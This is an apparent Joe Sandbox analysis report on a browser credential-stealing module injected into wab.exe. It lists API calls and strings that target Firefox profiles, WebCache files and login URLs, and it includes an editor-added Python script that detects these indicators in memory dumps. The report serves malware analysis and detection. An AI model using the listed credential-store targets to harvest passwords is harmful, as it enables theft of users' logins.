                  • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                  • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                  • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                  APIs
                  • memset.MSVCRT ref: 00403FE1
                  • memset.MSVCRT ref: 00403FF6
                  • memset.MSVCRT ref: 0040400B
                  • memset.MSVCRT ref: 00404020
                  • memset.MSVCRT ref: 00404035
                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                  • memset.MSVCRT ref: 004040FC
                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                    • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                  • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                  • API String ID: 3527940856-3369679110
                  • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                  • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                  • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                  • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy
                  • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                  • API String ID: 3510742995-2641926074
                  • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                  • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                  • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                  • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                  APIs
                    • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                    • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                    • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                  • memset.MSVCRT ref: 004033B7
                  • memcpy.MSVCRT ref: 004033D0
                  • wcscmp.MSVCRT ref: 004033FC
                  • _wcsicmp.MSVCRT ref: 00403439
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                  • String ID: $0.@
                  • API String ID: 3030842498-1896041820
                  • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                  • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                  • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                  • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                  APIs
                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                  • String ID:
                  • API String ID: 2941347001-0
                  • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                  • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                  • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                  • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                  APIs
                  • memset.MSVCRT ref: 00403C09
                  • memset.MSVCRT ref: 00403C1E
                    • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                    • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                  • wcscat.MSVCRT ref: 00403C47
                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                  • wcscat.MSVCRT ref: 00403C70
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memsetwcscat$Closewcscpywcslen
                  • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                  • API String ID: 3249829328-1174173950
                  • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                  • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                  • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                  • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                  APIs
                  • memset.MSVCRT ref: 0040A824
                  • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                  • wcscpy.MSVCRT ref: 0040A854
                  • wcscat.MSVCRT ref: 0040A86A
                  • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                  • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                  • String ID:
                  • API String ID: 669240632-0
                  • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                  • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                  • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                  • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                  APIs
                  • wcschr.MSVCRT ref: 00414458
                  • _snwprintf.MSVCRT ref: 0041447D
                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                  • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: PrivateProfileString$Write_snwprintfwcschr
                  • String ID: "%s"
                  • API String ID: 1343145685-3297466227
                  • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                  • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                  • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                  • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                  APIs
                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                  • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                  • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressHandleModuleProcProcessTimes
                  • String ID: GetProcessTimes$kernel32.dll
                  • API String ID: 1714573020-3385500049
                  • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                  • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                  • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                  • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                  APIs
                  • memset.MSVCRT ref: 004087D6
                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                    • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                  • memset.MSVCRT ref: 00408828
                  • memset.MSVCRT ref: 00408840
                  • memset.MSVCRT ref: 00408858
                  • memset.MSVCRT ref: 00408870
                  • memset.MSVCRT ref: 00408888
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                  • String ID:
                  • API String ID: 2911713577-0
                  • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                  • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                  • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                  • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcmp
                  • String ID: @ $SQLite format 3
                  • API String ID: 1475443563-3708268960
                  • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                  • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                  • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                  • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                  APIs
                    • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                  • memset.MSVCRT ref: 00414C87
                  • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                  • wcscpy.MSVCRT ref: 00414CFC
                    • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                  Strings
                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressCloseProcVersionmemsetwcscpy
                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                  • API String ID: 2705122986-2036018995
                  • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                  • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                  • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                  • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _wcsicmpqsort
                  • String ID: /nosort$/sort
                  • API String ID: 1579243037-1578091866
                  • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                  • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                  • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                  • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                  APIs
                  • memset.MSVCRT ref: 0040E60F
                  • memset.MSVCRT ref: 0040E629
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                  Strings
                  • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                  • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                  • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                  • API String ID: 3354267031-2114579845
                  • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                  • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                  • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                  • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
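Taken together, the function records above describe a credential harvester inside the injected wab.exe module: a URL-cache walk (FindFirstUrlCacheEntryW with the "visited:" prefix) combined with RegEnumValueW and comparisons against the Yahoo, Google and Facebook login URLs, a CredEnumerateW loop over the Windows Credential Manager, profile-path builders for Mozilla\Firefox, Mozilla\SeaMonkey and Waterfox, a memcmp against the "SQLite format 3" header, and the WebCacheV01.dat/WebCacheV24.dat paths. This matches the "WebBrowserPassView password recovery tool" Yara hit in the report overview. The script below is an example added to this page by the editor; it is not Joe Sandbox output and not code from the sample. It scans a raw memory dump (such as the .sdmp above) for the same import names and literals and reports which credential stores the module is equipped to read. Assumptions not stated on the page: wide-string literals are present in memory as UTF-16LE and import names as ASCII, the grouping of indicators into named stores is the editor's interpretation, and the sample bytes at the bottom are constructed for the demonstration.

```python
"""Triage a process memory dump for the credential-store indicators listed in
the function records above. Editor-added example, not part of the report.

Assumptions (not stated on the page): the dump is a raw byte image of the
injected module, import names sit in it as ASCII, and the literals handled by
the wcs* routines sit in it as UTF-16LE.
"""
from __future__ import annotations

import sys
from pathlib import Path


def wide(s: str) -> bytes:
    """UTF-16LE, how the wcs*-handled literals appear in the module (assumed)."""
    return s.encode("utf-16le")


def narrow(s: str) -> bytes:
    """ASCII, how import names and the SQLite magic appear in the module."""
    return s.encode("ascii")


# Indicators taken from the function records above. The grouping into stores
# is the editor's reading; every pattern in a group must be present for the
# store to count as targeted.
INDICATORS: dict[str, dict[str, bytes]] = {
    "ie_autocomplete": {
        "FindFirstUrlCacheEntryW": narrow("FindFirstUrlCacheEntryW"),
        "FindNextUrlCacheEntryW": narrow("FindNextUrlCacheEntryW"),
        "RegEnumValueW": narrow("RegEnumValueW"),
        "visited: prefix": wide("visited:"),
        "yahoo login url": wide("https://login.yahoo.com/config/login"),
        "google login url": wide("https://www.google.com/accounts/servicelogin"),
        "facebook url": wide("http://www.facebook.com/"),
    },
    "windows_credential_manager": {
        "CredEnumerateW": narrow("CredEnumerateW"),
    },
    "mozilla_firefox": {
        "profile path": wide("Mozilla\\Firefox\\Profiles"),
        "sqlite magic": narrow("SQLite format 3"),
    },
    "mozilla_seamonkey": {
        "profile path": wide("Mozilla\\SeaMonkey\\Profiles"),
        "sqlite magic": narrow("SQLite format 3"),
    },
    "waterfox": {
        "profile path": wide("Waterfox\\Profiles"),
        "sqlite magic": narrow("SQLite format 3"),
    },
    "ie_webcache": {
        "WebCacheV01.dat": wide("Microsoft\\Windows\\WebCache\\WebCacheV01.dat"),
        "WebCacheV24.dat": wide("Microsoft\\Windows\\WebCache\\WebCacheV24.dat"),
    },
}


def scan(data: bytes) -> dict[str, dict[str, list[str]]]:
    """Per store, list which indicators were found in the dump and which were not."""
    report: dict[str, dict[str, list[str]]] = {}
    for store, patterns in INDICATORS.items():
        found = [name for name, pat in patterns.items() if pat in data]
        missing = [name for name in patterns if name not in found]
        report[store] = {"found": found, "missing": missing}
    return report


def targeted_stores(data: bytes) -> list[str]:
    """Stores for which every indicator is present, sorted for stable output."""
    return sorted(store for store, r in scan(data).items() if not r["missing"])


def scan_file(path: str) -> list[str]:
    """Convenience wrapper: classify a dump file on disk."""
    return targeted_stores(Path(path).read_bytes())


# Constructed stand-in for a dump: the indicators separated by filler bytes.
# The Waterfox profile path is deliberately omitted so that store shows up
# as a partial match (its SQLite magic is shared with the Mozilla groups).
CONSTRUCTED_DUMP = (
    b"\x00" * 16
    + b"\x00".join(
        pat
        for store, patterns in INDICATORS.items()
        if store != "waterfox"
        for pat in patterns.values()
    )
    + b"\x00" * 16
)


if __name__ == "__main__":
    blob = Path(sys.argv[1]).read_bytes() if len(sys.argv) > 1 else CONSTRUCTED_DUMP
    for store, result in scan(blob).items():
        state = "TARGETED" if not result["missing"] else "partial/none"
        print(f"{store:28s} {state:12s} found={len(result['found'])} missing={result['missing']}")
```

Run it as `python triage.py hcaresult_11_2_400000_wab.bin` against a raw dump, or with no argument to see the constructed sample classified. A store reported as partial is not proof of absence: literals can be stack-built or decrypted at runtime, so a miss here should be followed up in the disassembly, exactly as the records above were produced.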
                  APIs
                  • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                  • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                  • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                  • LockResource.KERNEL32(00000000), ref: 004148EF
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Resource$FindLoadLockSizeof
                  • String ID:
                  • API String ID: 3473537107-0
                  • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                  • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                  • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                  • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                  APIs
                  Strings
                  • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset
                  • String ID: only a single result allowed for a SELECT that is part of an expression
                  • API String ID: 2221118986-1725073988
                  • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                  • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                  • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                  • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                  APIs
                  • Sleep.KERNEL32(00000064), ref: 004175D0
                  • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                  Similarity
                  • API ID: ChangeCloseFindNotificationSleep
                  • String ID: }A
                  • API String ID: 1821831730-2138825249
                  Similarity
                  • API ID: ??3@DeleteObject
                  • String ID: r!A
                  • API String ID: 1103273653-628097481
                  Similarity
                  • API ID: ??2@
                  • String ID:
                  • API String ID: 1033339047-0
                  APIs
                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                  • memcmp.MSVCRT ref: 00444BA5
                  Similarity
                  • API ID: AddressProc$memcmp
                  • String ID: $$8
                  • API String ID: 2808797137-435121686
                  Strings
                  • duplicate column name: %s, xrefs: 004307FE
                  • too many columns on %s, xrefs: 00430763
                  Similarity
                  • API ID:
                  • String ID: duplicate column name: %s$too many columns on %s
                  • API String ID: 0-1445880494
                  APIs
                    • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                    • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                    • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                    • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                    • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                    • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                    • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                    • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                    • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                  • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                    • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                    • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                    • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                  • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                  • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                    • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                    • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                    • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                  Similarity
                  • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                  • String ID:
                  • API String ID: 1042154641-0
                  APIs
                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                  • memset.MSVCRT ref: 00403A55
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                    • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                  Similarity
                  • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                  • String ID: history.dat$places.sqlite
                  • API String ID: 3093078384-467022611
                  APIs
                    • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
